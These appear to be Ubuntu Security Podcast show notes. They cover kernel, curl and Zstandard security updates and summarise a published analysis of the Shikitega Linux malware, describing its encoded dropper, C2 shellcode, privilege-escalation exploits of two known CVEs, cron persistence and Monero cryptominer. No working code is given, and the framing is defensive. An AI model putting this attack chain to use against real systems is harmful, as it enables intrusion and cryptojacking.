Overview
On this week’s episode we dive into the Shikitega Linux malware report from AT&T
Alien Labs, plus we cover security updates for the Linux kernel, curl and
Zstandard as well as some open positions on the team. Join us!
This week in Ubuntu Security Updates
13 unique CVEs addressed
- 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
- OOB write in virtual terminal driver when changing VGA console fonts
- Improper control flow mgmt in Intel 10GbE PCIe driver - local DoS
[USN-5594-1, USN-5599-1] Linux kernel (+ Oracle) vulnerabilities [01:28]
- 9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
- Above issues plus:
- NULL pointer deref in KVM on host if a VM tried to execute an illegal instruction
- OOB write in UDF file-system driver
- UAF in NFTS under certain error conditions
- OOB write in Intel SMBus host controller driver
- Race condition in handling of pipe buffers -> OOB
[USN-5587-1] curl vulnerability [02:12]
- 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
- Cookies generally contain
NAME=VALUE
pairs using ASCII chars for both
- ASCII character set contains usual A-Za-z0-9 and punctuation (space, “!#&)
plus a bunch of control codes - NUL, BEL, LF, CR, HT (\t) and more
- These have a byte value below 32
- curl since 4.9 would accept cookies with control codes
- As with cookies, these get sent back to the server on subsequent requests
- Over time web servers have started rejecting cookies with control codes and
returning a HTTP 400 response code (Bad Request)
- As such, a malicious “sister site” could return a cookie with control codes
inside it, this then would get sent by curl to other sites in the same domain,
which would then reject the request and effectively DoS the user
- Fixed to have curl validate and then reject such cookies in the first place
[USN-5593-1] Zstandard vulnerability [04:34]
Goings on in Ubuntu Security Community
AT&T Alien Labs teardown of Shikitega Linux malware [05:40]
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
- Targets endpoints and IoT devices running Linux
- Uses multiple different binaries to achieve its purpose - each does one task
of the process
- Uses various components of Metasploit along the way
- Framework containing various exploits plus different tools to help develop
exploits as well as scan environments etc
- Initial dropper is a very small binary that is encoded using one of the
standard Metasploit encoders to help it evade detection from AV scanners etc
- Decodes basic shellcode to open a socket to the C2 server and downloads
additional shellcode to run plus the mettle interpreter so that it can make
use of off-the-shelf components from Metasploit in further stages
- Also downloads the next stage dropper
- This again is encoded the same as the first component - contained within is
shellcode to spawn a shell via
/bin/sh
- from this shell it then attempts to
run commands to exploit two known privesc vulns - CVE-2021-4034
([USN-5252-1, USN-5252-2] PolicyKit vulnerability from Episode 147) and
CVE-2021-3493 ([USN-4916-2] Linux kernel vulnerability in Episode 113)
- Once has gained root privileges via these vulns, with then move on to achieve
persistence and execute the primary payload - cryptominer
- Persistence is achieved simply by using cron to download the cryptominer from
C2 on boot - and then another cron job to execute the cryptominer - and this
is done for both the standard user and root
- As such the only traces left on the machine at reboot is the crontabs
- cryptominer is the XMRig and is configured to mine Monero
- C2 is seemingly fronted by cloudflare and cloudfront
- No details provided on initial compromise but is good to see details on the
privesc vulns - both of these were patched in Ubuntu quite a while ago - and
we released a Livepatch for the kernel privesc too - shows the value in such
services - can still stay protected against the kind of vulnerabilities that
attackers are actually exploiting without the need to reboot
- Shows the increasing prevalence of Linux malware (and the resulting interest
in it from organisations like AT&T) but also the value in ensuring systems are
kept updated
systemd/open-vm-tools regression for Ubuntu 18.04 LTS [10:56]
- Had mentioned last week that I would likely cover this - is still a
work-in-progress so hopefully next week 🤞
Hiring [11:30]
Get in contact